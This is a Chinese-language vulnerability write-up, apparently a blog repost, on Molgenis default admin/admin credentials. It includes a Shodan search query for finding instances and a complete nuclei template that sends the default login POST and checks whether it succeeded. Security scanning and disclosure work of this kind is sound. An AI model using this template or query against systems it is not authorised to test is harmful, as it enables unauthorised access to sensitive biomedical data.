Molgenis Default Login Vulnerability

漏洞信息

漏洞名称: Molgenis Default Login Vulnerability

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: Molgenis是一个开源的数据管理系统,广泛应用于生物医学研究领域,用于存储、管理和分析大量的生物医学数据。该系统提供了一个用户友好的界面,支持数据的导入、导出和可视化分析,是许多研究机构和实验室的重要工具。该漏洞涉及Molgenis系统的默认登录凭证问题。具体来说,系统在安装后保留了默认的用户名和密码(admin/admin),如果管理员未及时更改这些凭证,攻击者可以利用这些默认凭证成功登录系统。这种漏洞的根源在于系统安装后的初始配置不当,未能强制或提醒管理员修改默认凭证。由于Molgenis系统通常处理敏感的科研数据,这种漏洞可能导致严重的安全风险。攻击者一旦登录系统,可以访问、修改或删除存储在系统中的数据,甚至可能利用系统权限执行更高级的攻击。值得注意的是,这种漏洞的利用不需要任何复杂的技巧,攻击者只需尝试使用默认凭证即可,因此风险等级被评定为高危。为了防止此类漏洞的利用,建议所有Molgenis系统的管理员在安装后立即更改默认的登录凭证,并定期检查系统的安全配置。

产品厂商: Molgenis

产品名称: Molgenis

搜索语法: html:”MOLGENIS”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/8b50cbcf8c7e827312fa38a050f54184a1380a50/http%2Fdefault-logins%2Fmolgenis-default-login.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

id: molgenis-default-login

info:
name: Molgenis - Default Login
author: ritikchaddha
severity: high
description: |
Attempts to login to Molgenis using the default credentials (admin/admin). Successful login may indicate a security risk due to unchanged default credentials.
reference:
- https://molgenis.org/
- https://github.com/molgenis/molgenis-emx2
metadata:
verified: true
max-request: 1
shodan-query: html:"MOLGENIS"
tags: molgenis,default-login,exposure

variables:
username: 'admin'
password: 'admin'

http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

username={{username}}&password={{password}}

matchers-condition: and
matchers:
- type: word
part: location
words:
- "/login?error"
negative: true

- type: word
part: header
words:
- "Set-Cookie: JSESSIONID="

- type: status
status:
- 302



Molgenis Default Login Vulnerability
http://example.com/2025/07/08/github_1582733934/
作者
lianccc
发布于
2025年7月8日
许可协议